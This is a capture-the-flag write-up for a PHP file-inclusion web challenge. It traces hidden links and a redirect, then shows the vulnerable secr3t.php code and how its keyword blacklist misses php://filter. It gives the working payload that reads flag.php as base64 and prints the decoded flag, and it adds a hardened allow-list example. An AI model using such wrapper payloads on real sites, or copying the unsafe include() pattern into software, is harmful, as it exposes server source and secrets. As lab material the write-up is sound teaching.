BUUCTF WEB [极客大挑战 2019]Secret File


2022-04-13


  • After launching the challenge, the landing page looks as follows (screenshot omitted)


  • Press F12 to view the page source

    <!DOCTYPE html>
    
    <html>
    
    <style type="text/css" >
    #master {
        position:absolute;
        left:44%;
        bottom:0;
        text-align :center;
            }
            p,h1 {
                    cursor: default;
            }
    </style>
    
            <head>
                    <meta charset="utf-8">
                    <title>蒋璐源的秘密</title>
            </head>
    
            <body style="background-color:black;"><br><br><br><br><br><br>
    
                <h1 style="font-family:verdana;color:red;text-align:center;">你想知道蒋璐源的秘密么?</h1><br><br><br>
    
                <p style="font-family:arial;color:red;font-size:20px;text-align:center;">想要的话可以给你,去找吧!把一切都放在那里了!</p>
                <a id="master" href="./Archive_room.php" style="background-color:#000000;height:70px;width:200px;color:black;left:44%;cursor:default;">Oh! You found me</a>
                <div style="position: absolute;bottom: 0;width: 99%;"><p align="center" style="font:italic 15px Georgia,serif;color:white;"> Syclover @ cl4y</p></div>
            </body>
    </html>
    

    One line of the markup contains a link to another page:

    <a id="master" href="./Archive_room.php" style="background-color:#000000;height:70px;width:200px;color:black;left:44%;cursor:default;">Oh! You found me</a>
    
  • Try visiting Archive_room.php


  • Clicking the SECRET button redirects automatically to end.php


  • Capturing the traffic with Burp Suite shows that action.php is requested in between. Send that request from Repeater:

    GET /action.php HTTP/1.1
    Host: b1dd1aed-6389-452a-8c8e-8f0363d3f057.node4.buuoj.cn:81
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://b1dd1aed-6389-452a-8c8e-8f0363d3f057.node4.buuoj.cn:81/Archive_room.php
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close
    

    The response is as follows:

    HTTP/1.1 302 Found
    Server: openresty
    Date: Sat, 09 Apr 2022 02:40:03 GMT
    Content-Type: text/html; charset=UTF-8
    Connection: close
    Location: end.php
    X-Powered-By: PHP/7.3.11
    Content-Length: 63
    
    <!DOCTYPE html>
    
    <html>
    <!--
       secr3t.php        
    -->
    </html>
    
  • Visit secr3t.php

    <html>
        <title>secret</title>
        <meta charset="UTF-8">
    <?php
        highlight_file(__FILE__);
        error_reporting(0);
        $file=$_GET['file'];
        if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
            echo "Oh no!";
            exit();
        }
        include($file); 
    // the flag is in flag.php
    ?>
    </html>
    

    This is clearly a file inclusion vulnerability: the value of the file parameter goes straight into include() after a simple substring blacklist.

About the filter

<?php
    highlight_file(__FILE__);
    error_reporting(0);
    $file=$_GET['file'];
    if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
        echo "Oh no!";
        exit();
    }
    include($file); 
// the flag is in flag.php
?>
  1. The strstr function

    strstr(string $haystack, mixed $needle, bool $before_needle = false): string
    

    Finds the first occurrence of a string: it returns the part of haystack from the first occurrence of needle to the end of haystack.

    Case-sensitive.

  2. The stristr function

    stristr(string $haystack, mixed $needle, bool $before_needle = false): string
    

    Same as strstr, but case-insensitive.

So the code rejects any $file value containing the sensitive substrings ../, tp, input or data; input and data are both keywords of the PHP pseudo-protocols (stream wrappers) commonly used in file inclusion exploitation.

The php://filter pseudo-protocol is not on the blacklist, so it can be used through the include to read the contents of flag.php (base64-encoded, so that the PHP source is returned as text instead of being executed).
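The root cause is that the include path is built from user input and only checked against a substring blacklist. Below is an added example of the hardened form (this is not code from the challenge or from the write-up): an allow-list maps a request key to a fixed file under a fixed directory, with a realpath() check as a second layer, so neither the path nor the stream wrapper is ever controlled by the client. The page directory and the page names in the allow-list are assumptions for illustration; the original blacklist is reproduced only so the two checks can be compared on the inputs from this write-up.

```php
<?php
// Added example: hardened replacement for the include logic in secr3t.php.
// Not part of the original challenge or write-up.
declare(strict_types=1);

// Assumption: includable pages live in this directory (hypothetical path).
const PAGE_DIR = __DIR__ . '/pages';

// Allow-list: request key => file name. Anything else is rejected outright.
const PAGES = [
    'home'    => 'home.php',
    'archive' => 'Archive_room.php',
    'end'     => 'end.php',
];

/**
 * Resolve a user-supplied page key to an absolute file path, or null.
 * 1. Only keys present in the allow-list are accepted.
 * 2. realpath() then confirms the resolved file really sits under PAGE_DIR,
 *    which protects against a misconfigured allow-list entry or a symlink.
 */
function resolve_page(string $key): ?string
{
    if (!array_key_exists($key, PAGES)) {
        return null;
    }
    $base = realpath(PAGE_DIR);
    $path = realpath(PAGE_DIR . '/' . PAGES[$key]);
    if ($base === false || $path === false) {
        return null;
    }
    // Defence in depth: the resolved path must start with "<PAGE_DIR>/".
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// The original blacklist from secr3t.php, kept here only for comparison.
function original_blacklist_allows(string $file): bool
{
    return !(strstr($file, "../") || stristr($file, "tp")
          || stristr($file, "input") || stristr($file, "data"));
}

// Inputs taken from this write-up: a legitimate key, a direct file name and
// the php://filter payload. The blacklist passes the last two; the allow-list
// only passes the first.
$samples = [
    'archive',
    'flag.php',
    'php://filter/read=convert.base64-encode/resource=flag.php',
];
foreach ($samples as $s) {
    printf("%-60s blacklist:%-5s allow-list:%s\n", $s,
        original_blacklist_allows($s) ? 'pass' : 'block',
        resolve_page($s) === null ? 'block' : 'pass');
}

// Actual request handling with the hardened check.
$key  = (string) ($_GET['file'] ?? 'home');
$path = resolve_page($key);
if ($path === null) {
    http_response_code(404);
    echo "Oh no!";
    exit();
}
include $path;
```

Run from the command line the script prints the comparison table and then, because the hypothetical pages directory does not exist, takes the rejection branch. The important design point is that the client chooses a key, not a path: with an allow-list there is no substring to sneak past, so wrapper tricks such as php://filter never reach include() at all, whereas the blacklist has to enumerate every dangerous token and, as this challenge shows, missed one.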

Construct the payload:

    /secr3t.php?file=php://filter/read=convert.base64-encode/resource=flag.php

This returns the base64-encoded file contents:

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

Decoding it gives the flag:

<!DOCTYPE html>

<html>

    <head>
        <meta charset="utf-8">
        <title>FLAG</title>
    </head>

    <body style="background-color:black;"><br><br><br><br><br><br>
        
        <h1 style="font-family:verdana;color:red;text-align:center;">啊哈!你找到我了!可是你看不到我QAQ~~~</h1><br><br><br>
        
        <p style="font-family:arial;color:red;font-size:20px;text-align:center;">
            <?php
                echo "我就在这里";
                $flag = 'flag{3be9e2b1-0e53-48e4-987b-0aacef0c9547}';
                $secret = 'jiAng_Luyuan_w4nts_a_g1rIfri3nd'
            ?>
        </p>
    </body>

</html>
